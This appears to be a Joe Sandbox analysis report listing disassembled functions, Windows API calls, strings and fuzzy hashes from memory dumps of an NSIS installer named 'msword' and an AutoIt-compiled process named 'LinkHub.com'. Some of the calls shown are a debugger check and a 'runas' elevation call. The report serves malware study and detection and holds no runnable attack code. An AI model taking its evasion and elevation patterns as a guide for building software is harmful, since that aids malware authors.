Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: LinkHub.comPID: 6072, Parent PID: 4624COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	74

Executed Functions

Function 00BB5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BB5FF7

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

GetCurrentProcess.KERNEL32(?,00C4DC2C,00000000,?,?), ref: 00BB6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00BB612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BB6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BB6167
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BB6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00BB617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00BB61A1

Strings

GetNativeSystemInfo, xrefs: 00BB6161
kernel32.dll, xrefs: 00BB6150
|O, xrefs: 00BF50F7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: f3c769e49ac566919065825785705c672ad69fbcea4342068fb3396b9fab2c04
Instruction ID: 625c3d01d8f575cfb9eb628106acb7b376cb913f1b33f44f887876fe4fa51932
Opcode Fuzzy Hash: f3c769e49ac566919065825785705c672ad69fbcea4342068fb3396b9fab2c04
Instruction Fuzzy Hash: 94A1A33594A6C4DFC722DB697CA93FD3FDCAB26300B0958D9D581A3232C66D4948CB39

Function 00BB338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BB3368,?), ref: 00BB33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BB3368,?), ref: 00BB33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C82418,00C82400,?,?,?,?,?,?,00BB3368,?), ref: 00BB343A

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Part of subcall function 00BB425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BB3462,00C82418,?,?,?,?,?,?,?,00BB3368,?), ref: 00BB42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00C82418,?,?,?,?,?,?,?,00BB3368,?), ref: 00BB34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00BF3CB0
SetCurrentDirectoryW.KERNEL32(?,00C82418,?,?,?,?,?,?,?,00BB3368,?), ref: 00BF3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C731F4,00C82418,?,?,?,?,?,?,?,00BB3368), ref: 00BF3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00BF3D81

Part of subcall function 00BB34D3: GetSysColorBrush.USER32(0000000F), ref: 00BB34DE
Part of subcall function 00BB34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00BB34ED
Part of subcall function 00BB34D3: LoadIconW.USER32(00000063), ref: 00BB3503
Part of subcall function 00BB34D3: LoadIconW.USER32(000000A4), ref: 00BB3515
Part of subcall function 00BB34D3: LoadIconW.USER32(000000A2), ref: 00BB3527
Part of subcall function 00BB34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB353F
Part of subcall function 00BB34D3: RegisterClassExW.USER32(?), ref: 00BB3590

Part of subcall function 00BB35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB35E1
Part of subcall function 00BB35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB3602
Part of subcall function 00BB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB3368,?), ref: 00BB3616
Part of subcall function 00BB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB3368,?), ref: 00BB361F

Part of subcall function 00BB396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB3A3C

Strings

runas, xrefs: 00BF3D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00BF3CAA
AutoIt, xrefs: 00BF3CA5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
